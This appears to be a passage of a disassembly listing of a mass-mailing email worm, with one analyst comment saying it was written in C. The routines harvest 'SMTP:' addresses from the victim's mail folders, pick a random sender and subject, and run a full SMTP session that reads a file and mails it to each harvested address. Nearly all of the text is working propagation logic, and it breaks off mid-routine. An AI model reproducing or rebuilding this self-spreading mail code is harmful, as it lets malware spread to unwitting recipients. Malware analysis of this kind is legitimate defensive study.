361758EB loc_361758EB: ; CODE XREF: sub_361757C5+D5j 361758EB ; sub_361757C5+DEj ... 361758EB xor esi, esi 361758ED mov ecx, edi 361758EF jmp short loc_361758F5 361758F1 ; ─────────────────────────────────────────────────────────────────────────── 361758F1 361758F1 loc_361758F1: ; CODE XREF: sub_361757C5+D1j 361758F1 mov ecx, edi 361758F3 xor esi, esi 361758F5 361758F5 loc_361758F5: ; CODE XREF: sub_361757C5+C8j 361758F5 ; sub_361757C5+CDj ... 361758F5 inc edi 361758F6 cmp edi, [ebp+arg_0] 361758F9 jb loc_36175865 361758FF 361758FF loc_361758FF: ; CODE XREF: sub_361757C5+9Aj 361758FF push 1 36175901 pop esi 36175902 36175902 loc_36175902: ; CODE XREF: sub_361757C5+86j 36175902 push [ebp+var_4] 36175905 push ebx 36175906 push dword_3617ACB4 3617590C call dword_3617AC70 36175912 mov eax, esi 36175914 36175914 loc_36175914: ; CODE XREF: sub_361757C5+66j 36175914 pop edi 36175915 pop esi 36175916 pop ebx 36175917 leave 36175918 retn 36175918 sub_361757C5 endp 36175918 36175919 36175919 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36175919 36175919 ; Attributes: bp-based frame 36175919 36175919 sub_36175919 proc near ; CODE XREF: sub_361757C5+120p 36175919 ; sub_36175FA5+D8p ... 36175919 36175919 var_81 = byte ptr -81h 36175919 var_80 = byte ptr -80h 36175919 arg_0 = dword ptr 8 36175919 36175919 push ebp 3617591A mov ebp, esp 3617591C sub esp, 80h 36175922 cmp [ebp+arg_0], 0 36175926 push ebx 36175927 push esi 36175928 mov esi, dword_3617D700 3617592E push edi 3617592F jz loc_361759E1 36175935 mov edi, ds:strncpy 3617593B mov ebx, 80h 36175940 push ebx 36175941 lea eax, [ebp+var_80] 36175944 push [ebp+arg_0] 36175947 push eax 36175948 call edi ; strncpy 3617594A lea eax, [ebp+var_80] 3617594D push eax 3617594E call ds:_strlwr 36175954 lea eax, [ebp+var_80] 36175957 push eax 36175958 call _strlen 3617595D add esp, 14h 36175960 cmp eax, 3 36175963 mov [ebp+arg_0], eax 36175966 jl short loc_361759E1 36175968 lea eax, [ebp+var_80] 3617596B push 40h 3617596D push eax 3617596E call ds:strchr 36175974 pop ecx 36175975 test eax, eax 36175977 pop ecx 36175978 jz short loc_361759E1 3617597A cmp [ebp+var_80], 40h 3617597E jz short loc_361759E1 36175980 mov eax, [ebp+arg_0] 36175983 cmp [ebp+eax+var_81], 40h 3617598B jz short loc_361759E1 3617598D 3617598D loc_3617598D: ; CODE XREF: sub_36175919+8Ej 3617598D test esi, esi 3617598F jz short loc_361759A9 36175991 lea eax, [ebp+var_80] 36175994 push esi 36175995 push eax 36175996 call _strcmp 3617599B pop ecx 3617599C test eax, eax 3617599E pop ecx 3617599F jz short loc_361759E1 361759A1 mov esi, [esi+80h] 361759A7 jmp short loc_3617598D 361759A9 ; ─────────────────────────────────────────────────────────────────────────── 361759A9 361759A9 loc_361759A9: ; CODE XREF: sub_36175919+76j 361759A9 push 84h 361759AE push 8 361759B0 push dword_3617ACB4 361759B6 call dword_3617AC74 361759BC test eax, eax 361759BE jz short loc_361759E1 361759C0 mov ecx, dword_3617D700 361759C6 push ebx 361759C7 mov [eax+80h], ecx 361759CD lea ecx, [ebp+var_80] 361759D0 push ecx 361759D1 push eax 361759D2 mov dword_3617D700, eax 361759D7 call edi ; strncpy 361759D9 add esp, 0Ch 361759DC push 1 361759DE pop eax 361759DF jmp short loc_361759E3 361759E1 ; ─────────────────────────────────────────────────────────────────────────── 361759E1 361759E1 loc_361759E1: ; CODE XREF: sub_36175919+16j 361759E1 ; sub_36175919+4Dj ... 361759E1 xor eax, eax 361759E3 361759E3 loc_361759E3: ; CODE XREF: sub_36175919+C6j 361759E3 pop edi 361759E4 pop esi 361759E5 pop ebx 361759E6 leave 361759E7 retn 361759E7 sub_36175919 endp 361759E7 361759E8 361759E8 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361759E8 361759E8 361759E8 sub_361759E8 proc near ; CODE XREF: sub_3617558B+67p 361759E8 push ebx 361759E9 xor ebx, ebx 361759EB cmp dword_3617D700, ebx 361759F1 jnz short loc_361759F7 361759F3 xor eax, eax 361759F5 pop ebx 361759F6 retn 361759F7 ; ─────────────────────────────────────────────────────────────────────────── 361759F7 361759F7 loc_361759F7: ; CODE XREF: sub_361759E8+9j 361759F7 cmp byte_3617D664, bl 361759FD push esi 361759FE jnz short loc_36175A44 36175A00 call ds:rand 36175A06 imul eax, 64h 36175A09 cdq 36175A0A mov ecx, 7FFFh 36175A0F idiv ecx 36175A11 mov edx, dword_3617D700 36175A17 36175A17 loc_36175A17: ; CODE XREF: sub_361759E8+33j 36175A17 ; sub_361759E8+46j 36175A17 cmp edx, ebx 36175A19 mov ecx, edx 36175A1B jz short loc_36175A17 36175A1D 36175A1D loc_36175A1D: ; CODE XREF: sub_361759E8+44j 36175A1D mov esi, eax 36175A1F dec eax 36175A20 test esi, esi 36175A22 jl short loc_36175A30 36175A24 mov ecx, [ecx+80h] 36175A2A cmp ecx, ebx 36175A2C jnz short loc_36175A1D 36175A2E jmp short loc_36175A17 36175A30 ; ─────────────────────────────────────────────────────────────────────────── 36175A30 36175A30 loc_36175A30: ; CODE XREF: sub_361759E8+3Aj 36175A30 push 80h 36175A35 push ecx 36175A36 push offset byte_3617D664 36175A3B call ds:strncpy 36175A41 add esp, 0Ch 36175A44 36175A44 loc_36175A44: ; CODE XREF: sub_361759E8+16j 36175A44 cmp dword_3617D700, ebx 36175A4A jz short loc_36175A7B 36175A4C 36175A4C loc_36175A4C: ; CODE XREF: sub_361759E8+91j 36175A4C push dword_3617D700 36175A52 call sub_36175AA9 36175A57 mov eax, dword_3617D700 36175A5C pop ecx 36175A5D push eax 36175A5E push ebx 36175A5F push dword_3617ACB4 36175A65 mov esi, [eax+80h] 36175A6B call dword_3617AC70 36175A71 cmp esi, ebx 36175A73 mov dword_3617D700, esi 36175A79 jnz short loc_36175A4C 36175A7B 36175A7B loc_36175A7B: ; CODE XREF: sub_361759E8+62j 36175A7B mov eax, dword_3617D704 36175A80 cmp eax, ebx 36175A82 jz short loc_36175AA3 36175A84 36175A84 loc_36175A84: ; CODE XREF: sub_361759E8+B9j 36175A84 mov esi, [eax+100h] 36175A8A push eax 36175A8B push ebx 36175A8C push dword_3617ACB4 36175A92 call dword_3617AC70 36175A98 mov eax, esi 36175A9A cmp esi, ebx 36175A9C mov dword_3617D704, eax 36175AA1 jnz short loc_36175A84 36175AA3 36175AA3 loc_36175AA3: ; CODE XREF: sub_361759E8+9Aj 36175AA3 push 1 36175AA5 pop eax 36175AA6 pop esi 36175AA7 pop ebx 36175AA8 retn 36175AA8 sub_361759E8 endp ; sp = -18h 36175AA8 36175AA9 36175AA9 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36175AA9 36175AA9 ; Attributes: bp-based frame 36175AA9 36175AA9 sub_36175AA9 proc near ; CODE XREF: sub_361759E8+6Ap 36175AA9 36175AA9 var_63C = byte ptr -63Ch 36175AA9 var_53C = byte ptr -53Ch 36175AA9 var_43C = byte ptr -43Ch 36175AA9 var_3C = byte ptr -3Ch 36175AA9 var_20 = word ptr -20h 36175AA9 var_1E = word ptr -1Eh 36175AA9 var_1C = byte ptr -1Ch 36175AA9 var_10 = dword ptr -10h 36175AA9 var_C = dword ptr -0Ch 36175AA9 var_8 = dword ptr -8 36175AA9 var_4 = dword ptr -4 36175AA9 arg_0 = dword ptr 8 36175AA9 36175AA9 push ebp 36175AAA mov ebp, esp 36175AAC sub esp, 63Ch 36175AB2 push ebx 36175AB3 push esi 36175AB4 push edi 36175AB5 push [ebp+arg_0] 36175AB8 call _strlen 36175ABD push 40h 36175ABF push [ebp+arg_0] 36175AC2 call ds:strchr 36175AC8 mov esi, eax 36175ACA xor ebx, ebx 36175ACC add esp, 0Ch 36175ACF cmp esi, ebx 36175AD1 jz loc_36175B58 36175AD7 push esi 36175AD8 call _strlen 36175ADD cmp eax, 2 36175AE0 pop ecx 36175AE1 jb short loc_36175B58 36175AE3 lea eax, [ebp+var_53C] 36175AE9 inc esi 36175AEA push eax 36175AEB push dword_3617A410 36175AF1 push esi 36175AF2 call sub_36171000 ; This worm seems to be written in some HLL, probably C. This can be evidenced by the 36175AF2 ; way the stack frame is set up within the subroutines. 36175AF7 add esp, 0Ch 36175AFA lea eax, [ebp+var_53C] 36175B00 push eax 36175B01 call dword_3617AC20 36175B07 mov esi, eax 36175B09 cmp esi, ebx 36175B0B jz short loc_36175B58 36175B0D push 10h 36175B0F lea eax, [ebp+var_20] 36175B12 push ebx 36175B13 push eax 36175B14 call _memset 36175B19 movsx eax, word ptr [esi+0Ah] 36175B1D push eax 36175B1E mov eax, [esi+0Ch] 36175B21 push dword ptr [eax] 36175B23 lea eax, [ebp+var_1C] 36175B26 push eax 36175B27 call _memcpy 36175B2C add esp, 18h 36175B2F mov [ebp+var_20], 2 36175B35 push 19h 36175B37 pop edi 36175B38 push edi 36175B39 call dword_3617AC38 36175B3F push ebx 36175B40 push 1 36175B42 pop esi 36175B43 mov [ebp+var_1E], ax 36175B47 push esi 36175B48 push 2 36175B4A call dword_3617AC5C 36175B50 cmp eax, 0FFFFFFFFh 36175B53 mov [ebp+var_4], eax 36175B56 jnz short loc_36175B5F 36175B58 36175B58 loc_36175B58: ; CODE XREF: sub_36175AA9+28j 36175B58 ; sub_36175AA9+38j ... 36175B58 xor eax, eax 36175B5A jmp loc_36175F17 36175B5F ; ─────────────────────────────────────────────────────────────────────────── 36175B5F 36175B5F loc_36175B5F: ; CODE XREF: sub_36175AA9+ADj 36175B5F mov [ebp+var_C], esi 36175B62 lea ecx, [ebp+var_C] 36175B65 mov esi, 8004667Eh 36175B6A push ecx 36175B6B push esi 36175B6C push eax 36175B6D call dword_3617AC18 36175B73 test eax, eax 36175B75 jz short loc_36175B7E 36175B77 36175B77 loc_36175B77: ; CODE XREF: sub_36175AA9+F7j 36175B77 ; sub_36175AA9+115j ... 36175B77 xor esi, esi 36175B79 jmp loc_36175F0C 36175B7E ; ─────────────────────────────────────────────────────────────────────────── 36175B7E 36175B7E loc_36175B7E: ; CODE XREF: sub_36175AA9+CCj 36175B7E lea eax, [ebp+var_20] 36175B81 push 10h 36175B83 push eax 36175B84 push [ebp+var_4] 36175B87 call dword_3617AC58 36175B8D lea eax, [ebp+var_C] 36175B90 mov [ebp+var_C], ebx 36175B93 push eax 36175B94 push esi 36175B95 push [ebp+var_4] 36175B98 call dword_3617AC18 36175B9E test eax, eax 36175BA0 jnz short loc_36175B77 36175BA2 mov esi, 400h 36175BA7 push 0Ah 36175BA9 lea eax, [ebp+var_43C] 36175BAF push esi 36175BB0 push eax 36175BB1 push [ebp+var_4] 36175BB4 call sub_36176215 36175BB9 add esp, 10h 36175BBC test eax, eax 36175BBE jz short loc_36175B77 36175BC0 cmp [ebp+var_43C], 32h 36175BC7 jnz short loc_36175B77 36175BC9 lea eax, [ebp+var_43C] 36175BCF push offset SMTP_HELO ; "HELO " 36175BD4 push eax 36175BD5 call _strcpy 36175BDA pop ecx 36175BDB and [ebp+var_3C], 0 36175BDF pop ecx 36175BE0 lea eax, [ebp+var_8] 36175BE3 push eax 36175BE4 lea eax, [ebp+var_3C] 36175BE7 push eax 36175BE8 mov [ebp+var_8], edi 36175BEB call ds:GetComputerNameA 36175BF1 lea eax, [ebp+var_3C] 36175BF4 push 3F8h 36175BF9 push eax 36175BFA lea eax, [ebp+var_43C] 36175C00 push eax 36175C01 call ds:strncat 36175C07 lea eax, [ebp+var_43C] 36175C0D push offset asc_3617A2AC ; "\r\n" 36175C12 push eax 36175C13 call _strcat 36175C18 lea eax, [ebp+var_43C] 36175C1E push esi 36175C1F push eax 36175C20 lea eax, [ebp+var_43C] 36175C26 push eax 36175C27 push [ebp+var_4] 36175C2A call sub_361761D7 36175C2F add esp, 24h 36175C32 test eax, eax 36175C34 jz loc_36175B77 36175C3A cmp [ebp+var_43C], 32h 36175C41 jnz loc_36175B77 36175C47 lea eax, [ebp+var_43C] 36175C4D push offset SMTP_MAIL ; "MAIL FROM: <" 36175C52 push eax 36175C53 call _strcpy 36175C58 mov ebx, offset byte_3617D664 36175C5D lea eax, [ebp+var_43C] 36175C63 push ebx 36175C64 push eax 36175C65 call _strcat 36175C6A mov edi, offset asc_3617A328 ; ">\r\n" 36175C6F lea eax, [ebp+var_43C] 36175C75 push edi 36175C76 push eax 36175C77 call _strcat 36175C7C lea eax, [ebp+var_43C] 36175C82 push esi 36175C83 push eax 36175C84 lea eax, [ebp+var_43C] 36175C8A push eax 36175C8B push [ebp+var_4] 36175C8E call sub_361761D7 36175C93 add esp, 28h 36175C96 test eax, eax 36175C98 jz loc_36175B77 36175C9E cmp [ebp+var_43C], 32h 36175CA5 jnz loc_36175B77 36175CAB lea eax, [ebp+var_43C] 36175CB1 push offset SMTP_RCPT ; "RCPT TO: <" 36175CB6 push eax 36175CB7 call _strcpy 36175CBC push [ebp+arg_0] 36175CBF lea eax, [ebp+var_43C] 36175CC5 push eax 36175CC6 call _strcat 36175CCB lea eax, [ebp+var_43C] 36175CD1 push edi 36175CD2 push eax 36175CD3 call _strcat 36175CD8 lea eax, [ebp+var_43C] 36175CDE push esi 36175CDF push eax 36175CE0 lea eax, [ebp+var_43C] 36175CE6 push eax 36175CE7 push [ebp+var_4] 36175CEA call sub_361761D7 36175CEF add esp, 28h 36175CF2 test eax, eax 36175CF4 jz loc_36175B77 36175CFA cmp [ebp+var_43C], 32h 36175D01 jnz loc_36175B77 36175D07 lea eax, [ebp+var_43C] 36175D0D push offset SMTP_DATA ; "DATA\r\n" 36175D12 push eax 36175D13 call _strcpy 36175D18 lea eax, [ebp+var_43C] 36175D1E push esi 36175D1F push eax 36175D20 lea eax, [ebp+var_43C] 36175D26 push eax 36175D27 push [ebp+var_4] 36175D2A call sub_361761D7 36175D2F add esp, 18h 36175D32 test eax, eax 36175D34 jz loc_36175B77 36175D3A cmp [ebp+var_43C], 33h 36175D41 jnz loc_36175B77 36175D47 lea eax, [ebp+var_43C] 36175D4D push offset aFrom ; "From: <" 36175D52 push eax 36175D53 call _strcpy 36175D58 lea eax, [ebp+var_43C] 36175D5E push ebx 36175D5F push eax 36175D60 call _strcat 36175D65 lea eax, [ebp+var_43C] 36175D6B push edi 36175D6C push eax 36175D6D call _strcat 36175D72 lea eax, [ebp+var_43C] 36175D78 push offset aSubject ; "Subject: " 36175D7D push eax 36175D7E call _strcat 36175D83 lea eax, [ebp+var_63C] 36175D89 push eax 36175D8A call sub_36175F1C 36175D8F lea eax, [ebp+var_63C] 36175D95 push eax 36175D96 lea eax, [ebp+var_43C] 36175D9C push eax 36175D9D call _strcat 36175DA2 lea eax, [ebp+var_43C] 36175DA8 push offset asc_3617A2AC ; "\r\n" 36175DAD push eax 36175DAE call _strcat 36175DB3 add esp, 34h 36175DB6 lea eax, [ebp+var_43C] 36175DBC push 3Ch 36175DBE push eax 36175DBF call _strlen 36175DC4 pop ecx 36175DC5 push eax 36175DC6 lea eax, [ebp+var_43C] 36175DCC push eax 36175DCD push [ebp+var_4] 36175DD0 call sub_361762B6 36175DD5 add esp, 10h 36175DD8 test eax, eax 36175DDA jz loc_36175B77 36175DE0 xor edi, edi 36175DE2 push edi 36175DE3 push edi 36175DE4 push 3 36175DE6 push edi 36175DE7 push 7 36175DE9 push 80000000h 36175DEE push offset byte_3617C8B8 36175DF3 call ds:CreateFileA 36175DF9 mov ebx, eax 36175DFB cmp ebx, 0FFFFFFFFh 36175DFE mov [ebp+arg_0], ebx 36175E01 jz loc_36175B77 36175E07 push edi 36175E08 push ebx 36175E09 call ds:GetFileSize 36175E0F cmp eax, 0FFFFFFFFh 36175E12 mov [ebp+var_8], eax 36175E15 jnz short loc_36175E23 36175E17 push ebx 36175E18 36175E18 loc_36175E18: ; CODE XREF: sub_36175AA9+395j 36175E18 call ds:CloseHandle 36175E1E jmp loc_36175B77 36175E23 ; ─────────────────────────────────────────────────────────────────────────── 36175E23 36175E23 loc_36175E23: ; CODE XREF: sub_36175AA9+36Cj 36175E23 add eax, 10h 36175E26 push eax 36175E27 push 8 36175E29 push dword_3617ACB4 36175E2F call dword_3617AC74 36175E35 mov ebx, eax 36175E37 cmp ebx, edi 36175E39 jnz short loc_36175E40 36175E3B push [ebp+arg_0] 36175E3E jmp short loc_36175E18 36175E40 ; ─────────────────────────────────────────────────────────────────────────── 36175E40 36175E40 loc_36175E40: ; CODE XREF: sub_36175AA9+390j 36175E40 lea eax, [ebp+var_10] 36175E43 push edi 36175E44 push eax 36175E45 mov [ebp+var_10], edi 36175E48 push [ebp+var_8] 36175E4B push ebx 36175E4C push [ebp+arg_0] 36175E4F call ds:ReadFile 36175E55 push [ebp+arg_0] 36175E58 test eax, eax 36175E5A jnz short loc_36175E75 36175E5C call ds:CloseHandle 36175E62 push ebx 36175E63 push edi 36175E64 push dword_3617ACB4 36175E6A 36175E6A loc_36175E6A: ; CODE XREF: sub_36175AA9+3EDj 36175E6A call dword_3617AC70 36175E70 jmp loc_36175B77 36175E75 ; ─────────────────────────────────────────────────────────────────────────── 36175E75 36175E75 loc_36175E75: ; CODE XREF: sub_36175AA9+3B1j 36175E75 call ds:CloseHandle 36175E7B push 3Ch 36175E7D push [ebp+var_8] 36175E80 push ebx 36175E81 push [ebp+var_4] 36175E84 call sub_361762B6 36175E89 add esp, 10h 36175E8C test eax, eax 36175E8E push ebx 36175E8F push edi 36175E90 push dword_3617ACB4 36175E96 jz short loc_36175E6A 36175E98 call dword_3617AC70 36175E9E lea eax, [ebp+var_43C] 36175EA4 push offset a__0 ; ".\r\n" 36175EA9 push eax 36175EAA call _strcpy 36175EAF lea eax, [ebp+var_43C] 36175EB5 push esi 36175EB6 push eax 36175EB7 lea eax, [ebp+var_43C] 36175EBD push eax 36175EBE push [ebp+var_4] 36175EC1 call sub_361761D7 36175EC6 add esp, 18h 36175EC9 test eax, eax 36175ECB jz loc_36175B77 36175ED1 cmp [ebp+var_43C], 32h 36175ED8 jnz loc_36175B77 36175EDE lea eax, [ebp+var_43C] 36175EE4 push offset SMTP_QUIT ; "QUIT\r\n" 36175EE9 push eax 36175EEA call _strcpy 36175EEF lea eax, [ebp+var_43C] 36175EF5 push esi 36175EF6 push eax 36175EF7 lea eax, [ebp+var_43C] 36175EFD push eax 36175EFE push [ebp+var_4] 36175F01 call sub_361761D7 36175F06 add esp, 18h 36175F09 push 1 36175F0B pop esi 36175F0C 36175F0C loc_36175F0C: ; CODE XREF: sub_36175AA9+D0j 36175F0C push [ebp+var_4] 36175F0F call dword_3617AC3C 36175F15 mov eax, esi 36175F17 36175F17 loc_36175F17: ; CODE XREF: sub_36175AA9+B1j 36175F17 pop edi 36175F18 pop esi 36175F19 pop ebx 36175F1A leave 36175F1B retn 36175F1B sub_36175AA9 endp 36175F1B 36175F1C 36175F1C ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36175F1C 36175F1C 36175F1C sub_36175F1C proc near ; CODE XREF: sub_36175AA9+2E1p 36175F1C 36175F1C arg_0 = dword ptr 4 36175F1C 36175F1C mov eax, dword_3617D704 36175F21 push esi 36175F22 test eax, eax 36175F24 jz short loc_36175F2F 36175F26 cmp dword ptr [eax+100h], 0 36175F2D jnz short loc_36175F5D 36175F2F 36175F2F loc_36175F2F: ; CODE XREF: sub_36175F1C+8j 36175F2F call sub_36171A7B 36175F34 mov esi, offset byte_3617A818 36175F39 push 2Eh 36175F3B push esi 36175F3C call ds:strchr 36175F42 pop ecx 36175F43 test eax, eax 36175F45 pop ecx 36175F46 jz short loc_36175F4B 36175F48 and byte ptr [eax], 0 36175F4B 36175F4B loc_36175F4B: ; CODE XREF: sub_36175F1C+2Aj 36175F4B push 0FFh 36175F50 push esi 36175F51 push [esp+0Ch+arg_0] 36175F55 call ds:strncat 36175F5B jmp short loc_36175F9D 36175F5D ; ─────────────────────────────────────────────────────────────────────────── 36175F5D 36175F5D loc_36175F5D: ; CODE XREF: sub_36175F1C+11j 36175F5D call ds:rand 36175F63 imul eax, 64h 36175F66 cdq 36175F67 mov ecx, 7FFFh 36175F6C idiv ecx 36175F6E mov ecx, dword_3617D704 36175F74 36175F74 loc_36175F74: ; CODE XREF: sub_36175F1C+5Cj 36175F74 ; sub_36175F1C+6Fj 36175F74 test ecx, ecx 36175F76 mov edx, ecx 36175F78 jz short loc_36175F74 36175F7A 36175F7A loc_36175F7A: ; CODE XREF: sub_36175F1C+6Dj 36175F7A mov esi, eax 36175F7C dec eax 36175F7D test esi, esi 36175F7F jl short loc_36175F8D 36175F81 mov edx, [edx+100h] 36175F87 test edx, edx 36175F89 jnz short loc_36175F7A 36175F8B jmp short loc_36175F74 36175F8D ; ─────────────────────────────────────────────────────────────────────────── 36175F8D 36175F8D loc_36175F8D: ; CODE XREF: sub_36175F1C+63j 36175F8D push 100h 36175F92 push edx 36175F93 push [esp+0Ch+arg_0] 36175F97 call ds:strncpy 36175F9D 36175F9D loc_36175F9D: ; CODE XREF: sub_36175F1C+3Fj 36175F9D add esp, 0Ch 36175FA0 push 1 36175FA2 pop eax 36175FA3 pop esi 36175FA4 retn 36175FA4 sub_36175F1C endp 36175FA4 36175FA5 36175FA5 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36175FA5 36175FA5 ; Attributes: bp-based frame 36175FA5 36175FA5 sub_36175FA5 proc near ; CODE XREF: sub_3617558B+62p 36175FA5 36175FA5 var_208 = byte ptr -208h 36175FA5 var_8 = dword ptr -8 36175FA5 var_4 = dword ptr -4 36175FA5 36175FA5 push ebp 36175FA6 mov ebp, esp 36175FA8 sub esp, 208h 36175FAE push edi 36175FAF lea eax, [ebp+var_8] 36175FB2 xor edi, edi 36175FB4 push eax 36175FB5 push edi 36175FB6 push 2 36175FB8 push edi 36175FB9 push offset aAabbcc ; "aabbcc" 36175FBE push edi 36175FBF mov [ebp+var_8], edi 36175FC2 call dword_3617D6FC 36175FC8 test eax, eax 36175FCA jz short loc_36175FD3 36175FCC xor eax, eax 36175FCE jmp loc_3617613B 36175FD3 ; ─────────────────────────────────────────────────────────────────────────── 36175FD3 36175FD3 loc_36175FD3: ; CODE XREF: sub_36175FA5+25j 36175FD3 lea eax, [ebp+var_208] 36175FD9 and [ebp+var_208], 0 36175FE0 push eax 36175FE1 push edi 36175FE2 lea eax, [ebp+var_208] 36175FE8 push 4000h 36175FED push eax 36175FEE push edi 36175FEF push edi 36175FF0 push [ebp+var_8] 36175FF3 call dword_3617D6F4 36175FF9 test eax, eax 36175FFB jnz loc_3617612C 36176001 push ebx 36176002 push esi 36176003 36176003 loc_36176003: ; CODE XREF: sub_36175FA5+17Fj 36176003 lea eax, [ebp+var_4] 36176006 push eax 36176007 push 800h 3617600C lea eax, [ebp+var_208] 36176012 push edi 36176013 push eax 36176014 push edi 36176015 push [ebp+var_8] 36176018 call dword_3617D6F0 3617601E test eax, eax 36176020 jnz loc_361760F7 36176026 mov eax, [ebp+var_4] 36176029 cmp eax, edi 3617602B jz loc_361760F7 36176031 mov eax, [eax+4] 36176034 cmp eax, edi 36176036 jz short loc_3617603F 36176038 push eax 36176039 call sub_3617613E 3617603E pop ecx 3617603F 3617603F loc_3617603F: ; CODE XREF: sub_36175FA5+91j 3617603F mov eax, [ebp+var_4] 36176042 mov eax, [eax+1Ch] 36176045 cmp eax, edi 36176047 jz short loc_36176083 36176049 mov esi, [eax+0Ch] 3617604C cmp esi, edi 3617604E jz short loc_36176083 36176050 push esi 36176051 call _strlen 36176056 cmp eax, 6 36176059 pop ecx 3617605A jbe short loc_36176083 3617605C cmp byte ptr [esi], 53h 3617605F jnz short loc_36176083 36176061 cmp byte ptr [esi+1], 4Dh 36176065 jnz short loc_36176083 36176067 cmp byte ptr [esi+2], 54h 3617606B jnz short loc_36176083 3617606D cmp byte ptr [esi+3], 50h 36176071 jnz short loc_36176083 36176073 cmp byte ptr [esi+4], 3Ah 36176077 jnz short loc_36176083 36176079 add esi, 5 3617607C push esi 3617607D call sub_36175919 36176082 pop ecx 36176083 36176083 loc_36176083: ; CODE XREF: sub_36175FA5+A2j 36176083 ; sub_36175FA5+A9j ... 36176083 mov ecx, [ebp+var_4] 36176086 xor ebx, ebx 36176088 mov eax, [ecx+24h] 3617608B cmp eax, edi 3617608D jz short loc_361760F7 3617608F 3617608F loc_3617608F: ; CODE XREF: sub_36175FA5+14Ej 3617608F cmp ebx, [ecx+20h] 36176092 jnb short loc_361760F5 36176094 add eax, edi 36176096 test eax, eax 36176098 jz short loc_361760E7 3617609A mov esi, [eax+0Ch] 3617609D test esi, esi 3617609F jz short loc_361760E7 361760A1 push esi 361760A2 call _strlen 361760A7 cmp eax, 6 361760AA pop ecx 361760AB jbe short loc_361760E7 361760AD cmp byte ptr [esi], 53h 361760B0 jnz short loc_361760E7 361760B2 cmp byte ptr [esi+1], 4Dh 361760B6 jnz short loc_361760E7 361760B8 cmp byte ptr [esi+2], 54h 361760BC jnz short loc_361760E7 361760BE cmp byte ptr [esi+3], 50h 361760C2 jnz short loc_361760E7 361760C4 cmp byte ptr [esi+4], 3Ah 361760C8 jnz short loc_361760E7 361760CA add esi, 5 361760CD push esi 361760CE call sub_36175919 361760D3 push 80h 361760D8 push esi 361760D9 push offset byte_3617D664 361760DE call ds:strncpy 361760E4 add esp, 10h 361760E7 361760E7 loc_361760E7: ; CODE XREF: sub_36175FA5+F3j 361760E7 ; sub_36175FA5+FAj ... 361760E7 mov ecx, [ebp+var_4] 361760EA inc ebx 361760EB add edi, 18h 361760EE mov eax, [ecx+24h] 361760F1 test eax, eax 361760F3 jnz short loc_3617608F 361760F5 361760F5 loc_361760F5: ; CODE XREF: sub_36175FA5+EDj 361760F5 xor edi, edi 361760F7 361760F7 loc_361760F7: ; CODE XREF: sub_36175FA5+7Bj 361760F7 ; sub_36175FA5+86j ... 361760F7 push [ebp+var_4] 361760FA call dword_3617D6EC 36176100 lea eax, [ebp+var_208] 36176106 mov [ebp+var_4], edi 36176109 push eax 3617610A push edi 3617610B lea eax, [ebp+var_208] 36176111 push 4000h 36176116 push eax 36176117 push edi 36176118 push edi 36176119 push [ebp+var_8] 3617611C call dword_3617D6F4 36176122 test eax, eax 36176124 jz loc_36176003 3617612A pop esi 3617612B pop ebx 3617612C 3617612C loc_3617612C: ; CODE XREF: sub_36175FA5+56j 3617612C push edi 3617612D push edi 3617612E push edi 3617612F push [ebp+var_8] 36176132 call dword_3617D6E4 36176138 push 1 3617613A pop eax 3617613B 3617613B loc_3617613B: ; CODE XREF: sub_36175FA5+29j 3617613B pop edi 3617613C leave 3617613D retn 3617613D sub_36175FA5 endp 3617613D 3617613E 3617613E ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617613E 3617613E ; Attributes: bp-based frame 3617613E 3617613E sub_3617613E proc near ; CODE XREF: sub_36175FA5+94p 3617613E 3617613E var_100 = byte ptr -100h 3617613E var_1 = byte ptr -1 3617613E arg_0 = dword ptr 8 3617613E 3617613E push ebp 3617613F mov ebp, esp 36176141 sub esp, 100h 36176147 cmp [ebp+arg_0], 0 3617614B push esi 3617614C mov esi, dword_3617D704 36176152 push edi 36176153 jz short loc_361761D1 36176155 mov edi, ds:strncpy 3617615B push 0FFh 36176160 push [ebp+arg_0] 36176163 lea eax, [ebp+var_100] 36176169 push eax 3617616A call edi ; strncpy 3617616C add esp, 0Ch 3617616F and [ebp+var_1], 0 36176173 36176173 loc_36176173: ; CODE XREF: sub_3617613E+52j 36176173 test esi, esi 36176175 jz short loc_36176192 36176177 lea eax, [ebp+var_100] 3617617D push esi 3617617E push eax 3617617F call _strcmp 36176184 pop ecx 36176185 test eax, eax 36176187 pop ecx 36176188 jz short loc_361761D1 3617618A mov esi, [esi+100h] 36176190 jmp short loc_36176173 36176192 ; ─────────────────────────────────────────────────────────────────────────── 36176192 36176192 loc_36176192: ; CODE XREF: sub_3617613E+37j 36176192 push 104h 36176197 push 8 36176199 push dword_3617ACB4 3617619F call dword_3617AC74 361761A5 test eax, eax 361761A7 jz short loc_361761D1 361761A9 mov ecx, dword_3617D704 361761AF push 100h 361761B4 mov [eax+100h], ecx 361761BA lea ecx, [ebp+var_100] 361761C0 push ecx 361761C1 push eax 361761C2 mov dword_3617D704, eax 361761C7 call edi ; strncpy 361761C9 add esp, 0Ch 361761CC push 1 361761CE pop eax 361761CF jmp short loc_361761D3 361761D1 ; ─────────────────────────────────────────────────────────────────────────── 361761D1 361761D1 loc_361761D1: ; CODE XREF: sub_3617613E+15j 361761D1 ; sub_3617613E+4Aj ... 361761D1 xor eax, eax 361761D3 361761D3 loc_361761D3: ; CODE XREF: sub_3617613E+91j 361761D3 pop edi 361761D4 pop esi 361761D5 leave 361761D6 retn 361761D6 sub_3617613E endp 361761D6 361761D7 361761D7 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361761D7 361761D7 ; Attributes: bp-based frame 361761D7 361761D7 sub_361761D7 proc near ; CODE XREF: sub_36175AA9+181p 361761D7 ; sub_36175AA9+1E5p ... 361761D7 361761D7 arg_0 = dword ptr 8 361761D7 arg_4 = dword ptr 0Ch 361761D7 arg_8 = dword ptr 10h 361761D7 arg_C = dword ptr 14h 361761D7 361761D7 push ebp 361761D8 mov ebp, esp 361761DA push 3Ch 361761DC push [ebp+arg_4] 361761DF call _strlen 361761E4 pop ecx 361761E5 push eax 361761E6 push [ebp+arg_4] 361761E9 push [ebp+arg_0] 361761EC call sub_361762B6 361761F1 add esp, 10h 361761F4 test eax, eax 361761F6 jnz short loc_361761FA 361761F8 pop ebp 361761F9 retn 361761FA ; ─────────────────────────────────────────────────────────────────────────── 361761FA 361761FA loc_361761FA: ; CODE XREF: 